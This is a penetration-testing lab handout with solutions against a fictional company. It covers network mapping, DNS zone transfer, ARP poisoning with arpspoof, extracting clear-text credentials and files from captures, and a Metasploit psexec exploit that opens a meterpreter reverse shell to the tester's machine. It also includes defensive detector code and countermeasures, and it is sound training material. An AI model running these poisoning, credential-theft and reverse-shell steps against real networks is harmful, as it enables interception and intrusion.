1. LAB SNIFFING LAB ID: 10


H E R A
LAB ID: 10
SNIFFING

- Sniffing in a switched network
- ARP Poisoning
- Analyzing a network traffic
- Extracting files from a network trace
- Stealing credentials
- Mapping/exploring network resources

1. LAB

You are a Penetration Tester and you are asked to determine if a very sensitive network segment is secure. The client, named Sportsfoo.com, is a small research company specialized in Sports, so all data from a specific segment should only be available to authorized users and should not be exposed to anybody else.

The scope provided by the client is any host/device on the /24 network.

The following image represents the LAB environment:

[Image: LAB environment diagram showing the network and the PENTESTER machine]

elearnsecurity s.r.l H E R A

2. GOALS

- Map the network
- Sniff the traffic
- Review the network traffic
- List your findings
- See what you can do with the credentials discovered
- Bonus: Provide a list of countermeasures to your client

3. WHAT YOU WILL LEARN

- How to map a network
- How to sniff in a switched network
- ARP Poisoning attack
- Review FTP and HTTP packets
- Obtain files transferred via SMB
- How to use the sensitive information obtained from the network trace in order to expand your access to the network

To guide you during the lab you will find different Tasks. Tasks are meant for educational purposes and to show you the usage of different tools and different methods to achieve the same goal. They are not meant to be used as a methodology.

Armed with the skills acquired through the tasks you can achieve the Lab goal. If this is the first time you do this lab, we advise you to follow these Tasks. Once you have completed all the Tasks, you can proceed to the end of this paper and check the solutions.

4. RECOMMENDED TOOLS

- netdiscover
- nmap
- arpspoof
- driftnet
- Wireshark
- Metasploit / PSEXEC
- SMBmount

5. IMPORTANT NOTE

Further information: Lab machines (like the web server and internal organization machines) are not connected to the internet. In order to connect to the target organization website you have to insert the following line in your hosts file:

intranet.sportsfoo.com

hosts path
Windows: C:\Windows\System32\drivers\etc\hosts
Linux: /etc/hosts

1. TASKS

Task 1: Host Discovery Using ARP requests

Using only ARP packets, please list all online hosts of the network /24.

Mac Address | Host IP address

Please list another way (another tool and its parameters) you could use to get the same information (still using only ARP packets):

Task 2: Host Discovery Using DNS

Task 2.1: Determine the DNS Server

Perform a port scan on all of the hosts above in order to identify which one is running the DNS service. Be very specific: make sure you only check for the DNS port. Also, using the same command line, determine if the DNS server is running Linux, BSD, or Windows.

DNS Server IP Address:

Task 2.2: Determine the domain name

Using any DNS lookup tool, determine for what domain name this DNS server is authoritative.

Domain Name:

Task 2.3: List additional hosts using DNS zone transfer

Once you know the domain name and the DNS server address, check if you are able to identify new hosts using a DNS zone transfer.

New Hosts:

Can you tell why the hosts above were not found using ARP requests?

Task 3: Identify the default gateway for the /24 network

According to all tasks above, you have been able to identify two different networks. Now we need to identify the default gateway that is handling the communication between these networks. How can you do that?

Task 4: Draw a network map

Let's draw a network map in order to graphically represent the environment that we have discovered so far.

Task 5: Sniff packets between the hosts and

Sniff all packets sent/received between the hosts and

Keep sniffing this target for 5 minutes. Save the network trace as /root/task5.pcap. Make sure you are able to see all images while you are sniffing.

Task 6: Sniff packets between the hosts and

Sniff all packets sent/received between the hosts and

Keep sniffing this target for 5 minutes. Save the network trace as /root/task6.pcap.

Task 7: Sniff packets between the hosts and

Sniff all packets sent/received between the hosts and

Keep sniffing this target for 5 minutes. Save the network trace as /root/task7.pcap.

Task 8: Analyze the file /root/task5.pcap

Task 8.1: Understand the big picture of the network traffic

Before diving into every single packet of the network trace, first try to get a big picture of what was obtained. Identify the most used protocols.

HTTP Percentage:
FTP Percentage:

Task 8.2: Analyze the HTTP traffic Part 1

Create a filter in Wireshark so you can see only the HTTP traffic. Also make sure your filter does not show any packet originating from or destined to your (attacker) machine.

The HTTP protocol consists of a couple of different commands (full details are available on the RFC 2616).

Task 8.3: Analyze the HTTP traffic Part 2

Remember that we were hired to determine if that network segment is secure, so analyze all of the packets and determine which ones are secure.

Task 8.4: Analyze the HTTP traffic Part 3

Find at least 2 HTTP requests which are not secure, but which don't seem to contain confidential information.

Task 8.5: Analyze the HTTP traffic Part 4

Find at least 2 HTTP requests that are really insecure and expose your client to big problems like identity theft, privilege escalation, etc.

Task 8.6: Analyze the FTP traffic Part 1

Create a filter in Wireshark to show only the FTP traffic.

Task 8.7: Analyze the FTP traffic Part 2

List the FTP commands issued by the host

Task 8.8: Analyze the FTP traffic Part 2

What is the username and password used during that FTP connection?

Task 9: Analyze the file /root/task6.pcap

Task 9.1: Determine the username and password in use for the website

Analyze all of the HTTP POST requests and determine what is the correct username and password in use by the host when accessing the

Username:
Password:

Task 9.2: Recover all of the files downloaded by the user above

By reviewing all of the HTTP GET requests, describe all of the files that were retrieved by the user above.

Task 10: Analyze the file /root/task7.pcap

Review the network trace obtained via task 7. Identify two files which were transferred via SMB and their contents.

Filename | Contents

Task 11: Use the credentials gathered in order to see what access you can get on the host

With two different credentials in hand, check if you can access the following resources:

\\ \finance
Credential:

\\ \technology
Credential:

Remote shell on the
Credential:

Task 12: Countermeasures

List at least one countermeasure that your client could implement for some of the problems identified during the test.

1. What protocol can be used on the in order to avoid that credentials are transmitted in clear-text?

2. What protocol or tool can be used as a replacement for the FTP service in use on the host ftp.sportsfoo.com?

3. What protocol can be used to ensure that all traffic between the file server and any other host on the LAN is encrypted?

4. What countermeasure can be implemented in order to protect the network against ARP poisoning attacks?

Solutions

Task 1: Host Discovery Using ARP requests

Answer:

netdiscover -i tap0 -r /24

Explanation: The netdiscover command works by sending ARP requests to the broadcast address asking for a specific IP address range (if specified). ARP (Address Resolution Protocol) is a protocol used for resolution of network layer addresses (IP addresses) into link layer addresses (MAC addresses). ARP works on layer 2 of the OSI model, so it can only be used to discover hosts which are located in the same subnet.

As you can see on the screenshot below, many ARP packets were sent to the broadcast address (ff:ff:ff:ff:ff:ff), however, ARP replies were only obtained from the hosts which are live: , , , and

Mac Address | Host IP address
00:50:56:b1:04:bc
:50:56:b1:05:b
:50:56:b1:05:b
00:50:56:b1:05:ba

Please, list another way (another tool and its parameters) you could use to do host discovery using only ARP requests:

Answer:

nmap -PR -sn

Task 2: Host Discovery Using DNS

Task 2.1: Determine the DNS Server

Answer:

nmap -sT -v -p

Explanation: As we already have a list of hosts found, we now need to query each one of these hosts in order to identify which one is running the DNS service. The DNS port is TCP/53 (for zone transfers) and UDP/53 (for DNS queries), so all we need to do is to check if TCP port 53 is open on all of the hosts that we know are online.

The command issued above tells nmap to use a TCP connect scan (-sT) to port 53 (-p53) against the hosts , , , and

As shown in the screenshot below, nmap sent four SYN packets, targeting port 53 of all of these hosts. According to the TCP 3-way handshake, the hosts which are listening on that port should answer with a SYN,ACK packet. The hosts which don't have port 53 open should answer with a RST,ACK packet.

As we can see on the screenshot, the only host which replied with a SYN,ACK packet is the , while the host replied with a RST,ACK packet, which means that port is closed. The hosts and have not responded with any packet, which means that a firewall (or another packet filtering mechanism) is likely in place.

DNS Server IP Address:

Task 2.2: Determine the domain name

Answer: sportsfoo.com

Explanation: Once we know a couple of hosts of our client and also which one is the DNS server for that network, our next step is to identify the network domain name. We can do that by using reverse lookups with nslookup or dig.

nslookup
(here we are launching the nslookup utility)

> server
(here we are telling the tool to use a specific DNS server. By default nslookup uses the DNS servers specified in the file /etc/resolv.conf)

Default server:
Address: #53

>
(here we are asking the DNS server to tell us what is the FQDN - fully qualified domain name - for the host. We could use any known IP address).

Server:
Address: #
in-addr.arpa name = wkst-techsupport.sportsfoo.com.

You could also use dig for the task above. The following command line would do all of the work above:

-x

Task 2.3: List additional hosts using DNS zone transfer

Answer:

sportsfoo.com -t AXFR

Explanation: Open zone transfers are usually a misconfiguration of a DNS server. They should be enabled, if required, only for trusted IP addresses (usually trusted downstream name servers). When zone transfers are open to anyone, we can enumerate all of the DNS records for that zone. There are a couple of different tools that are able to do that, however, we will focus on dig.

The command sportsfoo.com -t AXFR asks the DNS server to list all of its records (full zone transfer, -t AXFR) for the domain named sportsfoo.com.

The full command and its results are listed below. Note that we were able to discover two new hosts: and

sportsfoo.com -t AXFR
; <<>> DiG P1 sportsfoo.com -t AXFR
; (1 server found)
;; global options: +cmd
sportsfoo.com IN SOA els-winser2003.sportsfoo.com. hostmaster.sportsfoo.com
sportsfoo.com IN NS els-winser2003.sportsfoo.com.
sportsfoo.com IN NS els-winser2003.sports.com.
els-winser2003.sportsfoo.com IN A
ftp.sportsfoo.com IN A
intranet.sportsfoo.com IN A
wkst-finance.sportsfoo.com IN A
wkst-techsupport.sportsfoo.com IN A
sportsfoo.com IN SOA els-winser2003.sportsfoo.com. hostmaster.sportsfoo.com
;; Query time: 411 msec
;; SERVER: #53( )
;; WHEN: Sun Nov 18 03:19:
;; XFR size: 9 records (messages 9, bytes 609)

The new hosts found belong to a different network ( x). The penetration tester's laptop is placed in the network /24 and all of the host discovery performed so far was done using only ARP packets. We were unable to find these hosts before because ARP packets can only be sent to machines in the same broadcast domain, so ARP discovery only works for hosts in the same subnet.

Task 3: Identify the default gateway for the /24 network

Answer: The default gateway is

Explanation: One of the methods that could be used to identify the default gateway of a network is to track the path taken by packets across an IP network on their way to a given host. The traceroute command does exactly that, however, in this case it looks like the default gateway is blocking ICMP packets, so traceroute is not going to help here.

Another way to try to identify the default gateway is to evaluate the already existing routes in your system. You can do that by running the route command. As you can see below, whenever the penetration tester needs to communicate with the network , it is going to use the gateway

Note: In order to be able to sniff packets properly using arpspoof, you will need to use the same default gateway as the one in use by your target.

Task 4: Draw a network map

This is a possible graphic representation after compiling all information gathered so far:

[Network map: wkst-techsupport.sportsfoo.com, wkst-finance.sportsfoo.com, Default Gateway, PENTESTER, els-winser2003.sportsfoo.com (DNS Server), ftp.sportsfoo.com, intranet.sportsfoo.com]

Task 5: Sniff packets between the hosts and

In order to sniff all packets between the hosts and we can follow the instructions below:

1-) Prepare to collect all of the network traffic sent to/from your target:

1.1-) Launch Wireshark (if you are using BackTrack, click Applications, Forensics, Network Forensics, Wireshark).

1.2-) Select the network interface on which you intend to grab network traffic (click Capture, Interfaces, check tap0, and then click Start).

2-) Enable IP forwarding in your system. To do this, run the following command:

echo 1 > /proc/sys/net/ipv4/ip_forward

3-) Now we will need to trick our targets. We will need to tell the IP address that every time it needs to communicate with the IP address , it should forward the request to the PENTESTER system, and vice-versa. It can be done with the following commands (we will need two different terminal windows to run these commands):

arpspoof -i tap0 -t
arpspoof -i tap0 -t

The commands above will keep sending ARP packets in order to poison the ARP table of both hosts. The ARP table is set in a malicious way so that whenever the host needs to communicate with the , instead of going to the MAC address of the host , the traffic will go to the MAC address of our system (penetration tester).

In order to illustrate this attack, consider the following ARP table cache displayed on the system before launching the attack:

Now, see the same ARP cache table after launching our attack:

4-) Launch driftnet in order to see if there are any images in the traffic between these hosts, so you might have a clue about what they are doing. To do that, run the following command:

driftnet -i tap0

You might be able to see some images like:

5-) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (control + c) or close the arpspoof commands that might be still running. Save the network capture as /root/task5.pcap so we can review it later.
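Seen from the defender's side, the ARP cache change described in step 3 leaves a recognisable pattern: an IP address suddenly resolves to a different MAC address, and one MAC address starts answering for several IP addresses. The Python code below is an added example, not part of the original lab; it runs over a constructed list of ARP replies that uses documentation-range addresses (192.0.2.0/24, 00:00:5e:00:53:xx), and the `pinned` argument is an assumed way to model hosts that have a static ARP entry.

```python
from collections import defaultdict
from typing import NamedTuple


class Alert(NamedTuple):
    kind: str   # pinned_violation | binding_changed | mac_claims_multiple_ips
    ts: float
    ip: str
    mac: str


def detect_arp_poisoning(replies, pinned=None):
    """Return alerts for a sequence of (timestamp, sender_ip, sender_mac).

    pinned maps IP -> MAC for hosts with a static ARP entry (for example
    the default gateway); a reply contradicting it is always reported.
    """
    pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    last_mac = {}                   # ip -> MAC most recently announced
    ips_by_mac = defaultdict(set)   # mac -> every IP it has answered for
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        if ip in pinned and mac != pinned[ip]:
            alerts.append(Alert("pinned_violation", ts, ip, mac))
        elif ip in last_mac and last_mac[ip] != mac:
            # May also be a NIC replacement or a DHCP reassignment;
            # correlate with the multi-IP check below before escalating.
            alerts.append(Alert("binding_changed", ts, ip, mac))
        last_mac[ip] = mac
        if ip not in ips_by_mac[mac]:
            ips_by_mac[mac].add(ip)
            if len(ips_by_mac[mac]) > 1:
                # One interface answering for several IPs is what a
                # man-in-the-middle host looks like on the wire.
                alerts.append(Alert("mac_claims_multiple_ips", ts, ip, mac))
    return alerts


# Constructed sample data (not taken from the lab network).
GATEWAY_MAC = "00:00:5e:00:53:01"
WORKSTATION_MAC = "00:00:5e:00:53:10"
THIRD_HOST_MAC = "00:00:5e:00:53:66"

SAMPLE_REPLIES = [
    (0.0, "192.0.2.1", GATEWAY_MAC),       # normal bindings learned first
    (1.0, "192.0.2.10", WORKSTATION_MAC),
    (2.0, "192.0.2.66", THIRD_HOST_MAC),
    (10.0, "192.0.2.1", THIRD_HOST_MAC),   # gateway IP now claimed by third host
    (10.1, "192.0.2.10", THIRD_HOST_MAC),  # workstation IP claimed as well
    (12.0, "192.0.2.1", THIRD_HOST_MAC),   # the forged reply keeps being repeated
]

if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_REPLIES,
                                      pinned={"192.0.2.1": GATEWAY_MAC}):
        print(alert)
```
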

Task 6: Sniff packets between the hosts and

We will need to repeat the same technique used in Task 5, so let's summarize what we will need to do:

1-) Start Wireshark and start a new capture by selecting the proper network interface tap0.

2-) Check if IP forwarding is already enabled in your system by running the command cat /proc/sys/net/ipv4/ip_forward. The default value is 0. If it is 1, it means that it is already enabled. If it is disabled, make sure that you enable it by running the command:

echo 1 > /proc/sys/net/ipv4/ip_forward

3-) Now we will need to trick our targets by changing their ARP cache table. For that, we will need to open two different terminal windows and run the following commands:

arpspoof -i tap0 -t
arpspoof -i tap0 -t

4-) Launch driftnet so you can have an understanding about what is happening between these hosts. To do that, run the following command:

driftnet -i tap0

You might be able to see some images like:

5-) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (control + c) or close the arpspoof commands that might be still running. Save the network capture as /root/task6.pcap so we can review it later.

Task 7: Sniff packets between the hosts and

We will need to repeat the same techniques used in Task 5 and 6, so:

1-) Start Wireshark and start a new capture by selecting the network interface tap0.

2-) Check if IP forwarding is already enabled in your system by running the command cat /proc/sys/net/ipv4/ip_forward. The default value is 0. If it is 1, it means that it is already enabled. If it is disabled, make sure that you enable it by running the command:

echo 1 > /proc/sys/net/ipv4/ip_forward

3-) Now we will need to trick our targets by changing their ARP cache table. For that, we will need to open two different terminal windows and run the following commands:

arpspoof -i tap0 -t
arpspoof -i tap0 -t

4-) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (control + c) or close the arpspoof commands that might be still running. Save the network capture as /root/task7.pcap so we can review it later.

Task 8: Analyze the file /root/task5.pcap

Task 8.1: Understand the big picture of the network traffic gathered

Before diving into every packet of the network trace, first try to understand the type of traffic that was obtained. We can do that by opening the file /root/task5.pcap in Wireshark and then clicking Statistics, Protocol Hierarchy.

According to the screenshot above, we can see that from all traffic obtained, we got 2,02% of FTP traffic, 4,19% of HTTP traffic, and then 5,63% of SSL traffic.

Task 8.2: Analyze the HTTP traffic Part 1

Create a filter in Wireshark so you can see only the HTTP traffic. Also make sure that you only see the network traffic sent and received by your target ( ). You can do that by inserting the following string in the filter field as highlighted below:

http and ip.addr ==

Task 8.3: Analyze the HTTP traffic Part 2

After analyzing the HTTP traffic we were able to understand that it is a protocol which basically consists of a series of requests and responses. Also, all traffic transmitted in HTTP is transmitted in clear-text.

SSL is the protocol which implements security for the HTTP protocol. When you use SSL, your strings are not transmitted in clear-text, so even if someone is able to capture your traffic, they will have a hard time trying to decrypt it in order to understand what is going on.

So, in order to determine which packets sent/received by the host are secure, all we need to do is to create a filter for SSL packets:

Task 8.4: Analyze the HTTP traffic Part 3

One of the main commands used in the HTTP protocol is the HTTP GET request. HTTP GET requests are usually used when you want to retrieve a file from a webserver. In the screenshot below, we can see that the user has browsed to the file casillas.png on the website. You can see the HTTP GET request (in red) and also the HTTP response from the server (in blue):

So while the information is being transmitted in clear-text on the network, the mere fact that the user is browsing that website and downloading a couple of files is likely not a big deal.

We can see other HTTP GET requests issued by the user by creating the following filter in Wireshark:

http.request.method == "GET"

Task 8.5: Analyze the HTTP traffic Part 4

The HTTP POST request is usually used when a user wants to submit information to the webserver (like filling in a form). So it is definitely something that we want to check in order to see if critical information is being transmitted in clear-text. We can do that by creating the following filter in Wireshark:

http.request.method == "POST"

As you can see on the screenshot below, there are a couple of POST requests with a very interesting name: POST /checklogin.php. Let's take a closer look at one of these requests by selecting one of these packets, right clicking on it, and then selecting Follow TCP Stream:

According to the screenshot above, we are able to see an attempt to log in on the website by submitting the username gfreitas and the password However, it looks like it failed, because the server answered with an HTTP 302 code which redirects the user to a page named notheremyfriend.php.

Even if this credential is not valid for this website, an attacker might want to use that credential when attacking other resources.

On the same screen (Follow TCP Stream), click the button named Filter out This Stream, so Wireshark will temporarily exclude this request from the remaining packets and you can continue your analysis.

You will have to repeat the procedure above until you find a valid credential. According to the example below we were able to obtain a valid credential. While the password et1@sr7! used by the user admin is a strong one, it doesn't help since it is being transmitted in clear-text.

Note: You can try to validate this credential by trying to log in on the website.

Task 8.6: Analyze the FTP traffic Part 1

Create a filter in Wireshark to show only the FTP traffic. It is pretty simple: just type ftp in the Filter field and hit <Enter> or click the Apply button.

Task 8.7: Analyze the FTP traffic Part 2

List the FTP commands issued by the host

We can do that by selecting the first packet, right clicking on it, and selecting Follow TCP Stream:

All of the commands issued by the user are in red and all of the server responses are in blue.

Task 8.8: Analyze the FTP traffic Part 2

What is the username and password used during that FTP connection?

According to the screenshot above, the username is admin and the password is et1@sr7!

Task 9: Analyze the file /root/task6.pcap

Task 9.1: Determine the username and password in use for the website

Analyze all of the HTTP POST requests and determine what is the correct username and password in use by the host when accessing the

According to the second screenshot of the Task 8.7, we already understand that when a user is able to log in successfully they will get an HTTP 302 response which redirects the user to the page named login_success.php. If the authentication fails, they will also get an HTTP 302 response, however, the user will be redirected to the page named notheremyfriend.php.

With that in mind, instead of going through every single HTTP packet we can just create and apply a filter that shows only the packets of interest:

http.location == "login_success.php"

Then, right click on any of these packets and select Follow TCP Stream:

According to the screenshot below, we were able to identify one more working credential:

Username: almir
Password: Corinthians2012

Task 9.2: Recover all of the files downloaded by the user above

Use the following steps in order to recover (retrieve) all of the files downloaded by the user:

1-) Launch Wireshark and then open the following file: /root/task6.pcap

2-) Click File, Open, Export Objects, HTTP

Select one or more files and save them to a folder of your preference.

According to the screenshot below we were able to retrieve the files successfully:

Task 10: Analyze the file /root/task7.pcap

Review the network trace obtained in task 7. Identify two files which were transferred via SMB and their contents.

1-) Launch Wireshark and open the file /root/task7.pcap

2-) Click Statistics, Protocol Hierarchy in order to get an understanding of the type of traffic that we will need to deal with.

3-) According to the screenshot above, it looks like there was a significant amount of traffic being transmitted via SMB. So let's create a filter in Wireshark so we can only see traffic related to this protocol. We just need to type smb in the filter field and then click Apply:

4-) We can get a clue whether any files were transmitted via SMB by creating a filter with the following string:

smb.file

5-) According to the screenshot above, it looks like there are some interesting files being transmitted via SMB. We can try to retrieve those files using the following steps:

5.1-) Click File, Export Objects, SMB.

5.2-) You should see a list of files that were transmitted via SMB. Note that it looks like we have two different files. The first one has 374 bytes and the other has 662 bytes. According to the screenshot above, probably one of the files is performance.doc and the other one is salaries.doc.

5.3-) Save all files to a folder of your preference and give them the .doc extension. Then open the files in order to see their content:

Task 11: Use the credentials gathered in order to see what access you can get on the host

With two different credentials in hand, check if you can access the following resources:

1-) \\ \finance
2-) \\ \technology
3-) Remote shell on the

According to the tasks 8.5 and 8.7, we have discovered the following credential:

Username: admin
Password:

According to the task 9.1, we have discovered the credential below:

Username: almir
Password: Corinthians2012

Now, all we need to do is to test the credentials above in order to see which one can access the resources above.

11.1 Testing access to the UNC share: \\ \finance

1-) We can use the command smbmount in order to mount a UNC share in our Linux system. To do this we will need to type:

smbmount // /finance /tmp/finance -o username=almir,password=corinthians2012,rw

11.2 Testing access to the UNC share: \\ \technology

1-) We can use the command smbmount in order to mount a UNC share in our Linux system. To do this we will need to type:

smbmount // /technology /tmp/technology -o username=admin,password=et1@sr7!

11.3 Testing if you are able to get a remote shell on the

1-) Once we have two valid credentials we might want to try to get a remote shell by using the PSEXEC exploit. In order to do that, open the Metasploit Console (msfconsole) and prepare an exploit according to the parameters below:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set SMBUser admin
SMBUser => admin
msf exploit(psexec) > set SMBPass et1@sr7!
SMBPass => et1@sr7!
msf exploit(psexec) > set RHOST
RHOST =>
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST (Pentester IP address)
LHOST =>
msf exploit(psexec) > exploit

2-) Once you run the exploit above, you will see that you are able to get a remote shell on the host successfully, since the credential used (admin) is also a local administrator account for that particular host:

[*] Started reverse handler on :4444
[*] Connecting to the server...
[*] Authenticating to :445 WORKGROUP as user 'admin'...
[*] Uploading payload...
[*] Created \gntqvmkk.exe...
[*] Binding to
[*] Bound to
[*] Obtaining a service manager handle...
[*] Creating a new service (ZdlTfEpQ - "MSTOPiQJKeoqes")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage ( bytes) to
[*] Closing service handle...
[*] Deleting \gntqvmkk.exe...
[*] Meterpreter session 1 opened ( :4444 -> :1594) at :55:
meterpreter > shell
Process 3716 created.
Channel 1 created.
Microsoft Windows [Version ]
(C) Copyright Microsoft Corp.
C:\WINDOWS\system32>hostname
hostname
els-winser2003
C:\WINDOWS\system32>

Task 12: Countermeasures

List at least one countermeasure that your client could implement for some of the issues identified during the test:

1. What protocol can be used on the website in order to avoid that credentials are transmitted in clear-text?

Answer: SSL

2. What protocol or tool can be used as a replacement for the FTP service in use on the host ftp.sportsfoo.com?

Answer: SFTP

3. What protocol can be used to ensure that all traffic between the file server and any other host on the LAN is encrypted?

Answer: IPSEC

4. What countermeasure can be implemented in order to protect the network against ARP poisoning attacks?

Answer: You can use static ARP entries
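To check countermeasures 1 and 2 once they are deployed, a capture from the same segment can be audited for logins that are still sent in clear text. The Python code below is an added example, not part of the original lab: it reads constructed, already reassembled FTP and HTTP streams and reports the username and login outcome but never the password. The form field names, the sample accounts and the `audit_flows` input format are assumptions; /checklogin.php and the two redirect targets are the ones the lab describes.

```python
import re
from urllib.parse import parse_qsl

PASSWORD_FIELD = re.compile(r"pass|pwd", re.I)   # assumed form field naming
USER_FIELD = re.compile(r"user|login", re.I)


def audit_ftp(client_text, server_text):
    """Flag an FTP control channel that carried USER/PASS in clear text."""
    username, saw_pass = None, False
    for line in client_text.splitlines():
        verb, _, arg = line.strip().partition(" ")
        if verb.upper() == "USER":
            username = arg
        elif verb.upper() == "PASS":
            saw_pass = True          # the argument is deliberately not stored
    if not saw_pass:
        return None
    codes = {line[:3] for line in server_text.splitlines()}
    if "230" in codes:               # 230 = user logged in
        outcome = "accepted"
    elif "530" in codes:             # 530 = not logged in
        outcome = "rejected"
    else:
        outcome = "unknown"
    return {"protocol": "FTP", "username": username, "outcome": outcome}


def audit_http(request_text, response_text):
    """Flag a clear-text HTTP POST whose form body has a password field."""
    head, _, body = request_text.partition("\r\n\r\n")
    if not head.upper().startswith("POST "):
        return None
    fields = parse_qsl(body, keep_blank_values=True)
    if not any(PASSWORD_FIELD.search(name) for name, _ in fields):
        return None
    username = next((v for name, v in fields if USER_FIELD.search(name)), None)
    match = re.search(r"^Location:\s*(\S+)", response_text, re.I | re.M)
    target = match.group(1) if match else ""
    if target.endswith("login_success.php"):
        outcome = "accepted"
    elif target.endswith("notheremyfriend.php"):
        outcome = "rejected"
    else:
        outcome = "unknown"
    return {"protocol": "HTTP", "username": username, "outcome": outcome}


def audit_flows(flows):
    """flows: iterable of (protocol, server, client_text, server_text)."""
    auditors = {"ftp": audit_ftp, "http": audit_http}
    findings = []
    for protocol, server, client_text, server_text in flows:
        finding = auditors[protocol](client_text, server_text)
        if finding:
            finding["server"] = server
            findings.append(finding)
    return findings


# Constructed sample streams; accounts and secrets are made up.
SAMPLE_FLOWS = [
    ("ftp", "ftp.sportsfoo.com",
     "USER alice\r\nPASS constructed-secret\r\nLIST\r\nQUIT\r\n",
     "220 ready\r\n331 Password required\r\n230 Logged in\r\n221 Bye\r\n"),
    ("http", "intranet.sportsfoo.com",
     "POST /checklogin.php HTTP/1.1\r\nHost: intranet.sportsfoo.com\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
     "username=bob&password=constructed-secret",
     "HTTP/1.1 302 Found\r\nLocation: notheremyfriend.php\r\n\r\n"),
    ("http", "intranet.sportsfoo.com",
     "POST /checklogin.php HTTP/1.1\r\nHost: intranet.sportsfoo.com\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
     "username=alice&password=constructed-secret",
     "HTTP/1.1 302 Found\r\nLocation: login_success.php\r\n\r\n"),
    ("http", "intranet.sportsfoo.com",
     "GET /casillas.png HTTP/1.1\r\nHost: intranet.sportsfoo.com\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n\r\n"),
]

if __name__ == "__main__":
    for finding in audit_flows(SAMPLE_FLOWS):
        print(finding)
```

An empty result on a fresh capture is the evidence that the web login and the file transfer service no longer expose credentials on the wire.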


More information

Network Forensics Network Traffic Analysis

Network Forensics Network Traffic Analysis Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative

More information

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network

More information

Security of IPv6 and DNSSEC for penetration testers

Security of IPv6 and DNSSEC for penetration testers Security of IPv6 and DNSSEC for penetration testers Vesselin Hadjitodorov Master education System and Network Engineering June 30, 2011 Agenda Introduction DNSSEC security IPv6 security Conclusion Questions

More information

- Basic Router Security -

- Basic Router Security - 1 Enable Passwords - Basic Router Security - The enable password protects a router s Privileged mode. This password can be set or changed from Global Configuration mode: Router(config)# enable password

More information

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:

More information

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks

More information

Lab 2. CS-335a. Fall 2012 Computer Science Department. Manolis Surligas surligas@csd.uoc.gr

Lab 2. CS-335a. Fall 2012 Computer Science Department. Manolis Surligas surligas@csd.uoc.gr Lab 2 CS-335a Fall 2012 Computer Science Department Manolis Surligas surligas@csd.uoc.gr 1 Summary At this lab we will cover: Basics of Transport Layer (TCP, UDP) Broadcast ARP DNS More Wireshark filters

More information

Modern snoop lab lite version

Modern snoop lab lite version Modern snoop lab lite version Lab assignment in Computer Networking OpenIPLab Department of Information Technology, Uppsala University Overview This is a lab constructed as part of the OpenIPLab project.

More information

Linux Network Security

Linux Network Security Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols

More information

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting Chapter 1 1. Introducing Penetration Testing 1.1 What is penetration testing 1.2 Different types of test 1.2.1 External Tests

More information

My FreeScan Vulnerabilities Report

My FreeScan Vulnerabilities Report Page 1 of 6 My FreeScan Vulnerabilities Report Print Help For 66.40.6.179 on Feb 07, 008 Thank you for trying FreeScan. Below you'll find the complete results of your scan, including whether or not the

More information

Internet Security [1] VU 184.216. Engin Kirda engin@infosys.tuwien.ac.at

Internet Security [1] VU 184.216. Engin Kirda engin@infosys.tuwien.ac.at Internet Security [1] VU 184.216 Engin Kirda engin@infosys.tuwien.ac.at Christopher Kruegel chris@auto.tuwien.ac.at Administration Challenge 2 deadline is tomorrow 177 correct solutions Challenge 4 will

More information

How To Set Up A Network Map In Linux On A Ubuntu 2.5 (Amd64) On A Raspberry Mobi) On An Ubuntu 3.5.2 (Amd66) On Ubuntu 4.5 On A Windows Box

How To Set Up A Network Map In Linux On A Ubuntu 2.5 (Amd64) On A Raspberry Mobi) On An Ubuntu 3.5.2 (Amd66) On Ubuntu 4.5 On A Windows Box CSC-NETLAB Packet filtering with Iptables Group Nr Name1 Name2 Name3 Date Instructor s Signature Table of Contents 1 Goals...2 2 Introduction...3 3 Getting started...3 4 Connecting to the virtual hosts...3

More information

Author: Sumedt Jitpukdebodin. Organization: ACIS i-secure. Email ID: materaj@gmail.com. My Blog: http://r00tsec.blogspot.com

Author: Sumedt Jitpukdebodin. Organization: ACIS i-secure. Email ID: materaj@gmail.com. My Blog: http://r00tsec.blogspot.com Author: Sumedt Jitpukdebodin Organization: ACIS i-secure Email ID: materaj@gmail.com My Blog: http://r00tsec.blogspot.com Penetration Testing Linux with brute force Tool. Sometimes I have the job to penetration

More information

Sniffing in a Switched Network

Sniffing in a Switched Network Sniffing in a Switched Network -With A Recipe To Hack A Switch Using Ettercap and Ethereal -Manu Garg manugarg at gmail dot com Problem Statement- To gain access to main switch of your company using a

More information

Lab 1: Packet Sniffing and Wireshark

